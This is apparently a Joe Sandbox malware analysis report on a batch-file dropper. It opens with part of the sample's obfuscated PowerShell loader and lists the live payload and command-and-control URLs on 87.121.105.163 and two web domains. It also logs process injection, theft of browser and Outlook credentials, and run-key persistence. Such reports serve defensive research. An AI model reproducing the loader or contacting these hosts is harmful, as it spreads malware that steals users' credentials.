msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. ') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid Accounts1
        Windows Management Instrumentation
        1
        Scripting
        1
        Abuse Elevation Control Mechanism
        1
        Deobfuscate/Decode Files or Information
        1
        OS Credential Dumping
        3
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        3
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts11
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Abuse Elevation Control Mechanism
        LSASS Memory13
        System Information Discovery
        Remote Desktop Protocol1
        Data from Local System
        1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell
        1
        Registry Run Keys / Startup Folder
        411
        Process Injection
        3
        Obfuscated Files or Information
        Security Account Manager1
        Query Registry
        SMB/Windows Admin Shares1
        Email Collection
        4
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Registry Run Keys / Startup Folder
        1
        Software Packing
        NTDS21
        Security Software Discovery
        Distributed Component Object ModelInput Capture4
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets2
        Virtualization/Sandbox Evasion
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading
        Cached Domain Credentials1
        Process Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Virtualization/Sandbox Evasion
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Rundll32
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430938 Sample: PO_La-Tanerie04180240124.bat Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 51 www.tyaer.com 2->51 53 www.theplays.shop 2->53 55 3 other IPs or domains 2->55 71 Snort IDS alert for network traffic 2->71 73 Multi AV Scanner detection for domain / URL 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 4 other signatures 2->77 12 cmd.exe 1 2->12         started        15 wab.exe 1 2->15         started        17 wab.exe 3 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 99 Suspicious powershell command line found 12->99 101 Very long command line found 12->101 21 powershell.exe 14 23 12->21         started        25 conhost.exe 12->25         started        process6 dnsIp7 57 87.121.105.163, 50314, 50315, 80 NET1-ASBG Bulgaria 21->57 79 Suspicious powershell command line found 21->79 81 Very long command line found 21->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 21->83 27 powershell.exe 17 21->27         started        30 conhost.exe 21->30         started        32 cmd.exe 1 21->32         started        signatures8 process9 signatures10 95 Writes to foreign memory regions 27->95 97 Found suspicious powershell code related to unpacking or dynamic code loading 27->97 34 wab.exe 6 27->34         started        37 cmd.exe 1 27->37         started        process11 signatures12 65 Modifies the context of a thread in another process (thread injection) 34->65 67 Maps a DLL or memory area into another process 34->67 69 Queues an APC in another process (thread injection) 34->69 39 RAVCpl64.exe 34->39 injected process13 signatures14 85 Found direct / indirect Syscall (likely to bypass EDR) 39->85 42 AtBroker.exe 1 13 39->42         started        process15 signatures16 87 Tries to steal Mail credentials (via file / registry access) 42->87 89 Tries to harvest and steal browser information (history, passwords, etc) 42->89 91 Modifies the context of a thread in another process (thread injection) 42->91 93 Maps a DLL or memory area into another process 42->93 45 TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe 42->45 injected 49 firefox.exe 42->49         started        process17 dnsIp18 59 www.tyaer.com 47.91.88.207, 50316, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 45->59 61 www.theplays.shop 172.67.152.117, 50319, 50320, 50321 CLOUDFLARENETUS United States 45->61 63 www.oyoing.com 127.0.0.1 unknown unknown 45->63 103 Found direct / indirect Syscall (likely to bypass EDR) 45->103 signatures19

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        PO_La-Tanerie04180240124.bat0%ReversingLabs
        PO_La-Tanerie04180240124.bat0%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        www.fleksibox.store0%VirustotalBrowse
        www.oyoing.com10%VirustotalBrowse
        www.tyaer.com11%VirustotalBrowse
        www.theplays.shop0%VirustotalBrowse
        www.megabet303.lol2%VirustotalBrowse
        SourceDetectionScannerLabelLink
        https://go.micro0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png4100%Avira URL Cloudmalware
        http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
        http://www.theplays.shop/gnbc/0%Avira URL Cloudsafe
        http://87.121.105.163/Licences.ttf0%Avira URL Cloudsafe
        https://contoso.com/License0%Avira URL Cloudsafe
        http://87.121.105.163/vhhJQWfiJN142.bin0%Avira URL Cloudsafe
        https://contoso.com/Icon0%Avira URL Cloudsafe
        http://87.121.105.163/Licences.ttf8%VirustotalBrowse
        http://87.121.105.1630%Avira URL Cloudsafe
        https://contoso.com/Icon0%VirustotalBrowse
        http://87.121.105.163/vhhJQWfiJN142.bin14%VirustotalBrowse
        http://www.theplays.shop/gnbc/0%VirustotalBrowse
        http://www.theplays.shop/gnbc/?3rIdN=CFA+HkVxdb5EmOTiyKzJRx18y6HwiaTX//sAjaoe71zU1jru2C8H4zLuCGW9CrkOmabuxLOltM6mSwZ40cUW36eaDQ/OtyT9g3qPq0qmgtUTW0WFBiYRpF0=&-vl=m8zDpnb8Q0wTDj90%Avira URL Cloudsafe
        https://contoso.com/License0%VirustotalBrowse
        https://contoso.com/0%Avira URL Cloudsafe
        http://87.121.105.163/Licences.ttfpNBl0%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        http://87.121.105.16318%VirustotalBrowse
        http://www.xmlspy.com)0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png410%VirustotalBrowse
        https://contoso.com/1%VirustotalBrowse
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png13%VirustotalBrowse
        http://www.tyaer.com/gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9100%Avira URL Cloudmalware
        http://87.121.H0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.pngXz100%Avira URL Cloudmalware
        http://pesterbdd.com/images/Pester.pngXz10%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        www.fleksibox.store
        45.130.41.4
        truefalseunknown
        www.oyoing.com
        127.0.0.1
        truefalseunknown
        www.tyaer.com
        47.91.88.207
        truetrueunknown
        www.theplays.shop
        172.67.152.117
        truetrueunknown
        www.megabet303.lol
        unknown
        unknowntrueunknown
        NameMaliciousAntivirus DetectionReputation
        http://87.121.105.163/Licences.ttffalse
        • 8%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://www.theplays.shop/gnbc/true
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://87.121.105.163/vhhJQWfiJN142.binfalse
        • 14%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://www.theplays.shop/gnbc/?3rIdN=CFA+HkVxdb5EmOTiyKzJRx18y6HwiaTX//sAjaoe71zU1jru2C8H4zLuCGW9CrkOmabuxLOltM6mSwZ40cUW36eaDQ/OtyT9g3qPq0qmgtUTW0WFBiYRpF0=&-vl=m8zDpnb8Q0wTDj9true
        • Avira URL Cloud: safe
        unknown
        http://www.tyaer.com/gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9true
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://pesterbdd.com/images/Pester.png4powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpfalse
        • 10%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000005EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20092124595.00000000078B3000.00000004.00000020.00020000.00000000.sdmpfalse
          • 13%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://go.micropowershell.exe, 00000006.00000002.20347450981.0000025A23607000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://87.121.105.163powershell.exe, 00000006.00000002.20347450981.0000025A22DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.20347450981.0000025A24460000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.20347450981.0000025A233DF000.00000004.00000800.00020000.00000000.sdmpfalse
            • 18%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20092124595.00000000078B3000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://github.com/Pester/Pester4powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.20084185803.0000000004E71000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000005EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://87.121.105.163/Licences.ttfpNBlpowershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.quovadis.bm0powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://github.com/Pester/PesterXzpowershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.xmlspy.com)powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          https://aka.ms/pscore68powershell.exe, 00000006.00000002.20347450981.0000025A22971000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://ocsp.quovadisoffshore.com0powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.20347450981.0000025A22971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004E71000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://87.121.Hpowershell.exe, 00000006.00000002.20347450981.0000025A244BA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 10%, Virustotal, Browse
                              • Avira URL Cloud: malware
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              87.121.105.163
                              unknownBulgaria
                              43561NET1-ASBGfalse
                              172.67.152.117
                              www.theplays.shopUnited States
                              13335CLOUDFLARENETUStrue
                              47.91.88.207
                              www.tyaer.comUnited States
                              45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                              IP
                              127.0.0.1
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1430938
                              Start date and time:2024-04-24 11:54:51 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 11m 38s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Number of analysed new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:PO_La-Tanerie04180240124.bat
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winBAT@20/10@6/4
                              EGA Information:
                              • Successful, ratio: 60%
                              HCA Information:
                              • Successful, ratio: 96%
                              • Number of executed functions: 112
                              • Number of non-executed functions: 254
                              Cookbook Comments:
                              • Found application associated with file extension: .bat
                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                              • Execution Graph export aborted for target powershell.exe, PID 2316 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 3124 because it is empty
                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              TimeTypeDescription
                              10:57:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run S2U4LH C:\Program Files (x86)\windows mail\wab.exe
                              10:57:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run S2U4LH C:\Program Files (x86)\windows mail\wab.exe
                              11:56:51API Interceptor126x Sleep call for process: powershell.exe modified
                              11:58:20API Interceptor388745x Sleep call for process: AtBroker.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              87.121.105.163Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 87.121.105.163/fBizb192.bin
                              BRUFEN ORDER VAC442_7467247728478134247.vbsGet hashmaliciousGuLoader, RemcosBrowse
                              • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                              SCMP_#U547d#U4ee4_004020024001.wsfGet hashmaliciousUnknownBrowse
                              • 87.121.105.163/Assumes122.java
                              PO_La-Tannerie04190240419.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 87.121.105.163/kvRPYpXycVNsTooeadG247.bin
                              HTMCDevalueringstidspunkts2024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                              • 87.121.105.163/dFQwNyOh122.bin
                              rOferta_SKGNMECLemnedefinitionen353523577.wsfGet hashmaliciousGuLoader, RemcosBrowse
                              • 87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin
                              Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                              • 87.121.105.163/icjFpYDkBweqyeZ252.bin
                              PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 87.121.105.163/sssSAXCCU156.bin
                              EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                              • 87.121.105.163/YSnpkrCwWalJFSpN146.bin
                              172.67.152.117Pedido02304024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.theplays.shop/gnbc/
